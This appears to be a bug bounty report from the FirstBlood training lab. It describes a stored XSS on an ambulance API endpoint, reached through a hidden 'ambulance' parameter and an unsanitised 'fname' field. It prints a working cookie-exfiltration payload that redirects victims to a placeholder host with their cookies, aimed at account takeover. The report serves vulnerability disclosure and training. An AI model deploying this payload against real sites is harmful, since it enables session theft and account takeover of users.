FirstBlood-#1298Enable Ambulance Service for the Appointment leading to Stored XSS
This issue was discovered on FirstBlood v3

On 2022-12-09, mr_xhunt Level 8 reported:


I have found that while Creating the Appointment, adding ambulance parameter with value 1 enables the Ambulance service for us. and Adding the XSS payload in the fname gets us Stored XSS on the /api/ambulances.php.

Steps to Reproduce:

  1. You need to Create a Appointment and Intercept the request in Burpsuite
  2. Add a new parameter ambulance with value 1

  1. Now Add the payload in the fname parameter: hello"><script>document.location=http://LOCALHOST/${document.cookie}</script/x>

  1. Now go to the following endpoint and Enter the appointment guid:
  2. On visiting the page you will get alert box popup

  1. Using the payload given will leak the cookie and Can be used for ATO


The fname parameter values must be sanitized before writing it into the source.

P2 High

Endpoint: /api/ba.php & /api/ambulances.php

Parameter: ambulance & fname

Payload: 1 & hello"><script>document.location=`http://LOCALHOST/${document.cookie}`</script/x>

FirstBlood ID: 53
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on /api/ambulances.php?select={id} via the users first/last name. For this to work the parameter ambulance=1 must be set